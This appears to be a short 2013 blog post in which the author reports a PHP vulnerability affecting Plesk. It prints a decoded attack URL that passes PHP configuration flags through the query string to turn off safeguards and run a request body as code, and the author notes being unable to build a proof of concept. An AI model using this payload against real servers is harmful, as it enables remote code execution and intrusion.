Thursday 20 June 2013

PHPPATH/PHP Vulnerability.

It looks like a type of a remote command via PHP.


First of all, I had a url decode to the source
 HTTP://URL/phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -n  

Kindly find a vulnerability below URI.
I dont have the Plesk, so I cannot make PoC.

This vulnerability affects Plesk.